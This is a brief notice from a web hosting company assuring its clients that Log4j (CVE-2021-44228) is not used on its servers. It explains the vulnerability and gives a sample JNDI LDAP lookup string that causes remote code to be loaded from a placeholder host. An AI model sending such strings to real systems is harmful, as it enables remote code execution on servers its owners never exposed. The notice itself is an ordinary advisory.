In light of global concern, we would like to assure our clients that Apache Log4j (CVE-2021-44228) is not used anywhere on our web hosting servers or servers under our management.
Problem Description: A vulnerability was found in the Apache Log4j library versions 2.0.0 to 2.15.0. A remote attacker can execute arbitrary code on the server through the JNDI LDAP endpoint. By combining the JNDI tool and the LDAP protocol, an attacker can send a link to a file stored anywhere on the web in a log entry: ${jndi:ldap://example.cz/code} and execute it.
You can read more about this serious security issue at: